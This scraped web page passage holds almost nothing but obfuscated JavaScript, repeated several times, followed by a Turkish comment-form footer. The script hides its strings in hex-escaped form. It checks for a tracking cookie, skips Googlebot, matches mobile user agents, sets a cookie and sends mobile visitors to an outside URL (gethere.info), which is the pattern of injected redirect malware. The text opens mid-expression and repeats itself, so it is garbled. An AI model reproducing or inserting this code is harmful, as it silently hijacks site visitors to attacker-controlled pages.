)|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

CEVAP VER

Please enter your comment!
Please enter your name here